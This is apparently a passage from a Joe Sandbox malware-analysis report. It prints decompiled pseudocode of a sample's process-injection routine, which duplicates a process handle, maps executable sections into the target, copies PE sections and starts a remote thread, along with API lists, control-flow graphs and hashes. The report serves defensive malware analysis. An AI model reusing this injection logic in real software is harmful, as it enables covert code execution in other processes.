					_t193 =  &_v44;
					 *((intOrPtr*)(_t131 + 0x10))(_t193, 0x18);
					 *_t193 = 0x18;
					_push( &_v52);
					_push(_t193);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
						_v12 = 0;
						_t101 =  &_v84;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 = 0x5000;
						_t195 =  &_v88;
						if(NtCreateSection(_t195, 6, 0, _t101, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t27);
							_t124 =  &_v72;
							 *_t124 = 0;
							if(NtMapViewOfSection( *_t195, 0xffffffff, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t126 =  &_v64;
								 *_t126 = 0;
								if(NtMapViewOfSection( *_t195, _v16, _t126, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t206 = _v72;
									 *((intOrPtr*)(_t131 + 0x20))(0, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t103 =  &_v84;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = _a12 + 0x10000;
						_t193 =  &_v92;
						if(NtCreateSection(_t193, 0xe, 0, _t103, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t48);
							_t105 =  &_v76;
							 *_t105 = 0;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t105, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t107 =  &_v68;
								 *_t107 = 0;
								_t231 = NtMapViewOfSection( *_t193, _v16, _t107, 0, 0, 0,  &_v60, 1, 0, 0x20);
								if(_t231 == 0) {
									L25();
									if(_t231 == 0 && _t231 != 0) {
										asm("hlt");
										_push(_t212);
									}
									_push(0x2ea6);
									_t216 = _t212 + 4;
									_t165 = 0x2260;
									_t166 = _t165 << 5;
									_t167 = _t166 + 0x2260;
									asm("lodsb");
									_t168 = _t167;
									asm("loop 0xffffffc4");
									_t169 = _t168 ^ 0xad610a21;
									_t212 = _t216 - _t169;
									_t200 = _a8 +  *_a8;
									_t142 =  *(_t200 + 6) & 0x0000ffff;
									_push(_t200);
									_t170 = _t200;
									if(_v56 == 0) {
										_t171 = _t170 + 0xf8;
										__eflags = _t171;
									} else {
										_t171 = _t170 + 0x108;
									}
									_push(_t142);
									_t143 =  *(_t171 + 0x10);
									if(_t143 != 0) {
										memcpy( *((intOrPtr*)(_t171 + 0xc)) + _v76,  *((intOrPtr*)(_t171 + 0x14)) + _a8, _t143);
										_t212 = _t212 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t235 = _v56;
									if(_v56 == 0) {
										_push(_t193);
										_t174 = _t193[0xd] - _v68;
										_t203 = _t193[0x28] + _v76;
										__eflags = _t203;
										while(1) {
											__eflags =  *_t203;
											if( *_t203 == 0) {
												break;
											}
											_t185 =  *_t203;
											_t203 = _t203 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t174;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t185));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t193);
										__eflags = 0;
										_t111 =  &_v8;
										 *_t111 = 0;
										 *((intOrPtr*)(_t131 + 0x98))(_v16, 0, 0, 0, 0, 0, _t193[0xa] + _v68, _v64, _t111, 0);
									} else {
										L58();
										_pop(_t186);
										_t187 = _t186 - 0x1892;
										 *((intOrPtr*)(_t187 + 0x18c6)) = _t187 + 0x304c;
										L004012E3(_t131, _t235);
										0x33(_t187 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t187 + 0x18eb)) = _t187 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t94 =  *_t212;
				_push(0x392);
				_t161 = 0xf1;
				return L00401274(_t94, _t161, _t193, _t235);
			}





























































                            0x004015d4
                            0x004015d4
                            0x004015d4
                            0x004015d8
                            0x004015dc
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c4
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401754
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                            • Instruction ID: 47c243d31b0f26d8a37b4f88288270fe43ad698e9a2cc1103bbf91406d28765b
                            • Opcode Fuzzy Hash: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                            • Instruction Fuzzy Hash: 92511AB4900245BBEB219F91CC48FEBBFB8FF85700F14012AF912BA2E5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015EA Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 4015ea-4015ef 98 401603 94->98 99 4015f4-40162b call 401274 94->99 98->99 106 401630-401635 99->106 107 40162d 99->107 109 401956-40195e 106->109 110 40163b-40164c 106->110 107->106 109->106 113 401963-4019b3 call 401274 109->113 114 401652-40167b 110->114 115 401954 110->115 114->115 122 401681-401698 NtDuplicateObject 114->122 115->113 122->115 124 40169e-4016c2 NtCreateSection 122->124 126 4016c4-4016e5 NtMapViewOfSection 124->126 127 40171e-401744 NtCreateSection 124->127 126->127 130 4016e7-401703 NtMapViewOfSection 126->130 127->115 131 40174a-40174e 127->131 130->127 132 401705-40171b 130->132 131->115 133 401754-401775 NtMapViewOfSection 131->133 132->127 133->115 136 40177b-401797 NtMapViewOfSection 133->136 136->115 139 40179d call 4017a2 136->139
                            C-Code - Quality: 58%
                            			E004015EA(void* __esi, void* __eflags) {
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t132;
				signed int _t139;
				int _t140;
				void* _t157;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				intOrPtr _t180;
				void* _t181;
				void* _t182;
				HANDLE* _t188;
				HANDLE* _t190;
				void* _t195;
				intOrPtr* _t198;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t209;
				long _t224;

				asm("aad 0x6b");
				_push(0x392);
				_t205 = _t204 + 4;
				L00401274(0x161d, 0xf1, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
				_t188 = _t202 - 0x60;
				 *_t188 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
				_t91 =  *_t188;
				if(_t91 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t91;
					_t132[1] = 0;
					_t188 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
					 *_t188 = 0x18;
					_push(_t202 - 0x30);
					_push(_t188);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t202 - 8)) = 0;
						_t99 = _t202 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t190 = _t202 - 0x54;
						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t122 = _t202 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t202 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
								}
							}
						}
						_t101 = _t202 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t103 = _t202 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t202 - 0x40;
								 *_t105 = 0;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
								if(_t224 == 0) {
									L24();
									if(_t224 == 0 && _t224 != 0) {
										asm("hlt");
										_push(_t205);
									}
									_push(0x2ea6);
									_t209 = _t205 + 4;
									_t161 = 0x2260;
									_t162 = _t161 << 5;
									_t163 = _t162 + 0x2260;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc4");
									_t165 = _t164 ^ 0xad610a21;
									_t205 = _t209 - _t165;
									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t195 + 6) & 0x0000ffff;
									_push(_t195);
									_t166 = _t195;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t167 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t205 = _t205 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t188);
									_t228 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t188);
										_t170 = _t188[0xd] -  *(_t202 - 0x40);
										_t198 = _t188[0x28] +  *(_t202 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t180 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t170;
												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t188);
										__eflags = 0;
										_t109 = _t202 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
									} else {
										L57();
										_pop(_t181);
										_t182 = _t181 - 0x1892;
										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
										L004012E3(_t128, _t228);
										0x33(_t182 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t205;
				_push(0x392);
				_t157 = 0xf1;
				return L00401274(_t92, _t157, _t188, _t228);
			}







































                            0x004015ea
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                            • Instruction ID: 897f24c5fa4790511d5421a469eabb5bc73caab52430bd7d1b353843a9d98d60
                            • Opcode Fuzzy Hash: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                            • Instruction Fuzzy Hash: CB510BB4900245BBEF209F91CC48FEB7BB8FF85700F14016AF912BA2E5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 141 4015e0-4015ef 143 401603 141->143 144 4015f4-40162b call 401274 141->144 143->144 151 401630-401635 144->151 152 40162d 144->152 154 401956-40195e 151->154 155 40163b-40164c 151->155 152->151 154->151 158 401963-4019b3 call 401274 154->158 159 401652-40167b 155->159 160 401954 155->160 159->160 167 401681-401698 NtDuplicateObject 159->167 160->158 167->160 169 40169e-4016c2 NtCreateSection 167->169 171 4016c4-4016e5 NtMapViewOfSection 169->171 172 40171e-401744 NtCreateSection 169->172 171->172 175 4016e7-401703 NtMapViewOfSection 171->175 172->160 176 40174a-40174e 172->176 175->172 177 401705-40171b 175->177 176->160 178 401754-401775 NtMapViewOfSection 176->178 177->172 178->160 181 40177b-401797 NtMapViewOfSection 178->181 181->160 184 40179d call 4017a2 181->184
                            C-Code - Quality: 58%
                            			E004015E0(void* __esi, void* __eflags) {
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t133;
				signed int _t140;
				int _t141;
				void* _t158;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t167;
				intOrPtr* _t168;
				void* _t171;
				intOrPtr _t181;
				void* _t182;
				void* _t183;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t210;
				long _t225;

				asm("bound edi, [eax+0x161d]");
				_push(0x392);
				_t206 = _t205 + 4;
				L00401274(0x161d, 0xf1, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t203 + 8));
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
				_t189 = _t203 - 0x60;
				 *_t189 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t189);
				_t91 =  *_t189;
				if(_t91 != 0) {
					_t133 = _t203 - 0x30;
					 *_t133 = _t91;
					_t133[1] = 0;
					_t189 = _t203 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t203 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t203 - 8)) = 0;
						_t99 = _t203 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t191 = _t203 - 0x54;
						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t122 = _t203 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t203 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
								}
							}
						}
						_t101 = _t203 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t103 = _t203 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t203 - 0x40;
								 *_t105 = 0;
								_t225 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
								if(_t225 == 0) {
									L23();
									if(_t225 == 0 && _t225 != 0) {
										asm("hlt");
										_push(_t206);
									}
									_push(0x2ea6);
									_t210 = _t206 + 4;
									_t162 = 0x2260;
									_t163 = _t162 << 5;
									_t164 = _t163 + 0x2260;
									asm("lodsb");
									_t165 = _t164;
									asm("loop 0xffffffc4");
									_t166 = _t165 ^ 0xad610a21;
									_t206 = _t210 - _t166;
									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t140 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t167 = _t196;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t168 = _t167 + 0xf8;
										__eflags = _t168;
									} else {
										_t168 = _t167 + 0x108;
									}
									_push(_t140);
									_t141 =  *(_t168 + 0x10);
									if(_t141 != 0) {
										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t141);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t229 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t189);
										_t171 = _t189[0xd] -  *(_t203 - 0x40);
										_t199 = _t189[0x28] +  *(_t203 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t181 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t171;
												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										__eflags = 0;
										_t109 = _t203 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
									} else {
										L56();
										_pop(_t182);
										_t183 = _t182 - 0x1892;
										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
										L004012E3(_t128, _t229);
										0x33(_t183 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t206;
				_push(0x392);
				_t158 = 0xf1;
				return L00401274(_t92, _t158, _t189, _t229);
			}







































                            0x004015e2
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
